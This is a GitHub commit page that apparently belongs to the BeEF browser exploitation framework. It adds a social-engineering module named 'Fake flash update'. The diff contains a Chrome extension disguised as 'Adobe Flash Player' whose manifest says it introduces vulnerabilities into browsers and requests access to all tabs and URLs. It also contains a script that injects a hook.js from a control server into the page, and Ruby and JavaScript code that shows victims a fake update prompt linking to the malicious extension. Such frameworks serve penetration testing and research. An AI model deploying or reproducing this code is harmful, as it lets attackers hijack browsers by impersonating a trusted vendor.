Permalink
Browse files

added fake flash player module and chrome extension

  • Loading branch information...
mike-at-aura committed May 27, 2012
1 parent b84ec77 commit dc040a51acad3538c45fb4cca468092904708710
@@ -0,0 +1,4 @@
+d=document;
+e=d.createElement('script');
+e.src="http://127.0.0.1:3000/hook.js";
+d.body.appendChild(e);
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,22 @@
+{
+ "name": "Adobe Flash Player",
+ "version": "1.0",
+ // when the browser icon is clicked, a new tab is open to maintain persistence (chrome.tabs.create)
+ // for the sake of testing...unfortunately the popup is closed when the user is not focusing on it.
+ // See at the end of index.html file.
+ "description": "Introduces vulnerabilites into webbrowsers",
+ "background": {
+ "scripts": ["background.js"]
+ },
+ "icons": {
+ "16": "icon16.png",
+ "48": "icon48.png",
+ "128": "icon128.png"
+ },
+ "permissions": [
+ "tabs",
+ "http://*/*",
+ "https://*/*",
+ "file://*/*"
+ ]
+}
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,32 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ // Grab image and payload from config
+ image = "<%== @image %>";
+ payload = "<%== @payload %>";
+
+ // Add div to page
+ div = document.createElement('div');
+ div.setAttribute('id', 'splash');
+ div.setAttribute('style', 'position:absolute; top:30%; left:40%;');
+ div.setAttribute('align', 'center');
+ document.body.appendChild(div);
+ div.innerHTML= '<a href=\'' + payload + '\' ><img src=\''+ image +'\' /></a>';
+ $j("#splash").click(function () {
+ $j(this).hide();
+ });
+});
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ fake_flash_update:
+ enable: true
+ category: "Social Engineering"
+ name: "Fake flash update"
+ description: "Prompts the user to install an update to adobe flash player that is a malicious chrome extension"
+ authors: ["mh"]
+ target:
+ user_notify: ['ALL']
@@ -0,0 +1,38 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Fake_flash_update < BeEF::Core::Command
+
+ def self.options
+ configuration = BeEF::Core::Configuration.instance
+ payload = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.crx"
+ image = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.png"
+
+ return [
+ {'name' =>'payload', 'description' =>'Location of the chrome extension that user is promted to install', 'ui_label'=>'Chrome extension', 'value' => payload},
+ {'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Splash image', 'value' => image}
+
+ ]
+ end
+
+ #
+ # This method is being called when a zombie sends some
+ # data back to the framework.
+ #
+ def post_execute
+ save({'answer' => @datastore['answer']})
+ end
+
+end

0 comments on commit dc040a5

Please sign in to comment.